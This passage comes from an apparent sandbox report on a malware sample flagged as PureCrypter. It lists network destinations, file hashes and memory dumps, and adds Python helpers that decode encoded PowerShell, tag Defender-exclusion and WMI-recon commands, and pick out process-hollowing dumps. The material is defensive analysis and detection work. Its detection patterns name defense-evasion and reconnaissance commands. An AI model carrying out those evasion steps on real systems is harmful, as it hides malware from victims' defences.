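    for m in _ENC_FLAG_RE.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not 'encodedcommand'.startswith(flag):
            continue  # e.g. -ExecutionPolicy also starts with -e but is not this flag
        try:
            return base64.b64decode(blob, validate=True).decode('utf-16-le')
        except (ValueError, UnicodeDecodeError):
            return None  # malformed blob: report as undecodable rather than crash
    return None


def tag_cmdline(cmdline):
    """Return (decoded_script_or_None, [tags]) for one command line.
    Tags are matched against both the raw command line and the decoded script."""
    script = decode_encoded_command(cmdline)
    text = cmdline.lower() + ' ' + (script or '').lower()
    tags = []
    if script is not None:
        tags.append('encoded-powershell')
    if 'set-mppreference' in text and 'exclusion' in text:
        tags.append('defender-exclusion')      # Impair Defenses, ATT&CK T1562.001
    if 'start-sleep' in text:
        tags.append('sleep-delay')             # outlast short sandbox timeouts
    if re.search(r'\bwmic\b', text) and any(
            k in text for k in ('os get', 'cpu get', 'win32_videocontroller')):
        tags.append('wmi-fingerprint')         # OS / CPU / GPU recon, typical stealer profiling
    if re.search(r'\\ixp\d{3}\.tmp\\', text):
        tags.append('iexpress-extraction')     # IXP000.TMP is the wextract SFX drop directory
    return script, tags


def triage(cmdlines):
    """Run tag_cmdline over a process list and keep only the lines that matched."""
    findings = []
    for cmdline in cmdlines:
        script, tags = tag_cmdline(cmdline)
        if tags:
            findings.append({'cmdline': cmdline, 'decoded': script, 'tags': tags})
    return findings


if __name__ == '__main__':
    for finding in triage(REPORT_CMDLINES):
        print(finding['tags'], finding['decoded'] or finding['cmdline'])
```

Matching on the decoded script rather than the raw command line is the point: `Set-MpPreference` never appears in the process list as written, so a rule keyed on the visible command line would miss the exclusion. The base64 itself is also a usable indicator, since a given encoded string is stable across samples that reuse the same loader.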
Network
| Country | Destination | Domain | Proto |
| DE | 162.19.139.184:2222 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 93.184.220.29:80 | | tcp |
| AU | 104.46.162.224:443 | | tcp |
| NL | 104.80.225.205:443 | | tcp |
| DE | 45.9.74.11:8081 | | tcp |
Files
memory/5028-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | ba50f2bca86ba947a8d2035bb9b35123 |
| SHA1 | a542b5c5d41174dc2475a219978123b7d14f958f |
| SHA256 | 17790c5c071280462ed8e617fd2edfff5bf0f40fb9add57f866f058fdbf24cb5 |
| SHA512 | 08fdb619e411247c571710bc47df2463c95dc2fee82025e548b65ff1a3e4a53e663fafec9bcc5cc234f32211b25f6f9472786c1be543eb71629f32ec09f04379 |
memory/5008-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 14a9737eb666769fee7c28a00eb14e82 |
| SHA1 | ab8f2279f13a546fc32233a4da0855660fb07ec0 |
| SHA256 | a5fda7973fc4b9cf7fa14943302c0b6cd81c7615105ab0031e20fc5ed2a2396a |
| SHA512 | 973d5236da1979d31376d55f6b304fa166835d99a4574e3345e25ebed5b492cf9a3ae3f0a800d137fa8756288684b6d5c07ff97c8e5c2cbb698585f09373e9e7 |
memory/5008-138-0x0000000000590000-0x0000000000D04000-memory.dmp
memory/5008-139-0x0000000006C90000-0x0000000006CB2000-memory.dmp
memory/508-140-0x0000000000000000-mapping.dmp
memory/508-141-0x00000000026B0000-0x00000000026E6000-memory.dmp
memory/508-142-0x0000000004E20000-0x0000000005448000-memory.dmp
memory/508-143-0x0000000004D70000-0x0000000004DD6000-memory.dmp
memory/508-144-0x0000000005640000-0x00000000056A6000-memory.dmp
memory/508-145-0x00000000049F0000-0x0000000004A0E000-memory.dmp
memory/508-146-0x00000000072D0000-0x000000000794A000-memory.dmp
memory/508-147-0x0000000006190000-0x00000000061AA000-memory.dmp
memory/4212-148-0x0000000000000000-mapping.dmp
memory/3168-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/1128-151-0x0000000000000000-mapping.dmp
memory/1128-152-0x0000000000400000-0x0000000000731000-memory.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | b4d95160aa00515bfde8bbbfdc2b191f |
| SHA1 | a44d72801fcb0cb225d3b0e49a06f7000c6b31fd |
| SHA256 | 8610266929c66757c1e28943997b0601164b5b12bb1fe47d9ed0d3307545e442 |
| SHA512 | 70797e097d41780782040a290c674fc37761b39f40e2edc62910ad667b0713884590ed849b5b387cd9309e5d63058481ced3366c83e6a983755b396bbce62dce |
memory/1128-155-0x0000000000400000-0x0000000000731000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 901f167f644cde6d413e2e354f67c328 |
| SHA1 | c5c5003ceb3d9311600344c4edb7c3cd7b5705b2 |
| SHA256 | e22d61c636e05b5ae29cb9ea2600153dc45e4ca7133ab00a21b93b72046b3381 |
| SHA512 | 1f534872642644ab416ae470b606c712751a96bb3d7af14bc30d5d2b90254e9b8a68dc06e7ac3826809fa68adea8f6b7d4624ead5bef94234a133500790750fc |
memory/1128-157-0x0000000000400000-0x0000000000731000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/4200-159-0x0000000000000000-mapping.dmp
memory/3168-160-0x0000000006730000-0x0000000006762000-memory.dmp
memory/3168-161-0x00000000734D0000-0x000000007351C000-memory.dmp
memory/3168-162-0x0000000006710000-0x000000000672E000-memory.dmp
memory/3168-163-0x0000000007500000-0x000000000750A000-memory.dmp
memory/3256-164-0x0000000000000000-mapping.dmp
memory/3168-166-0x0000000007740000-0x00000000077D6000-memory.dmp
memory/4808-165-0x0000000000000000-mapping.dmp
memory/1492-167-0x0000000000000000-mapping.dmp
memory/2388-168-0x0000000000000000-mapping.dmp
memory/3168-169-0x0000000006000000-0x000000000600E000-memory.dmp
memory/3168-170-0x00000000076C0000-0x00000000076DA000-memory.dmp
memory/3168-171-0x00000000076A0000-0x00000000076A8000-memory.dmp
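The SetThreadContext signature in behavioral2 records PID 5008 (the AppData\Roaming\Voice\voiceadequovl.exe stage flagged as PureCrypter) setting the thread context of PID 1128 (a second voiceadequovl.exe), which together with the WriteProcessMemory signature is consistent with process hollowing. The Files section above lists three 0x400000-0x731000 dumps for PID 1128, the region where a hollowed child's replaced image sits, so those are the dumps to hand to a PE-rebuild or YARA pass first. The script below is an added example and not sandbox tooling: it parses the dump names and the signature text to make that selection mechanically. The `memory/<pid>-<seq>-<start>-<end>-memory.dmp` layout and the "PID X set thread context of Y" wording are taken from this report; the 0x400000 image-base heuristic and the function names are the example's assumptions.

```python
"""Correlate this report's memory-dump artifact names with its SetThreadContext
signature to find the dumps most likely to hold the injected payload.
Added example for this page, not the sandbox's own code."""
import re
from collections import defaultdict

# Constructed input: a subset of the behavioral2 Files artifact names copied from above.
REPORT_DUMPS = """\
memory/5028-132-0x0000000000000000-mapping.dmp
memory/5008-135-0x0000000000000000-mapping.dmp
memory/5008-138-0x0000000000590000-0x0000000000D04000-memory.dmp
memory/5008-139-0x0000000006C90000-0x0000000006CB2000-memory.dmp
memory/508-140-0x0000000000000000-mapping.dmp
memory/508-142-0x0000000004E20000-0x0000000005448000-memory.dmp
memory/1128-151-0x0000000000000000-mapping.dmp
memory/1128-152-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1128-155-0x0000000000400000-0x0000000000731000-memory.dmp
memory/1128-157-0x0000000000400000-0x0000000000731000-memory.dmp
memory/3168-149-0x0000000000000000-mapping.dmp
memory/3168-161-0x00000000734D0000-0x000000007351C000-memory.dmp
"""

# Signature row copied from "Suspicious use of SetThreadContext" in behavioral2.
REPORT_SETTHREADCONTEXT = "PID 5008 set thread context of 1128"

# "mapping.dmp" entries carry no address range; "memory.dmp" entries carry start and end.
_DUMP_RE = re.compile(
    r'memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-(?:0x([0-9A-Fa-f]+)-memory|mapping)\.dmp')
_STC_RE = re.compile(r'PID (\d+) set thread context of (\d+)')


def parse_dumps(text):
    """Group dumped regions by PID: {pid: [(seq, start, end, name), ...]}.
    Mapping-only entries are skipped because they describe no address range."""
    regions = defaultdict(list)
    for line in text.splitlines():
        name = line.strip()
        m = _DUMP_RE.match(name)
        if not m or m.group(4) is None:
            continue
        pid, seq = int(m.group(1)), int(m.group(2))
        start, end = int(m.group(3), 16), int(m.group(4), 16)
        regions[pid].append((seq, start, end, name))
    return regions


def parse_setthreadcontext(desc):
    """Return (injector_pid, target_pid) from the signature text, or None."""
    m = _STC_RE.search(desc)
    return (int(m.group(1)), int(m.group(2))) if m else None


def candidate_payload_dumps(dump_text, stc_desc, image_base=0x400000):
    """Return, in dump order, the names of the SetThreadContext target's dumps whose
    region starts at the classic 32-bit PE image base: the hollowed process's
    rewritten image. The image_base heuristic is this example's assumption."""
    pair = parse_setthreadcontext(stc_desc)
    if pair is None:
        return []
    _injector, target = pair
    regions = parse_dumps(dump_text)
    return [name for seq, start, end, name in sorted(regions.get(target, []))
            if start == image_base]


def region_size(dump_name):
    """Size in bytes of a memory.dmp region, or None for a mapping-only entry."""
    m = _DUMP_RE.match(dump_name)
    if not m or m.group(4) is None:
        return None
    return int(m.group(4), 16) - int(m.group(3), 16)


if __name__ == '__main__':
    for name in candidate_payload_dumps(REPORT_DUMPS, REPORT_SETTHREADCONTEXT):
        print(f'{name}  ({region_size(name):#x} bytes)')
```

The injector's own image is visible in the same data: PID 5008 has a 0x590000-0xD04000 region, the relocated base of the stage that performed the injection, which is the dump to use when the question is the crypter rather than the payload it unpacked.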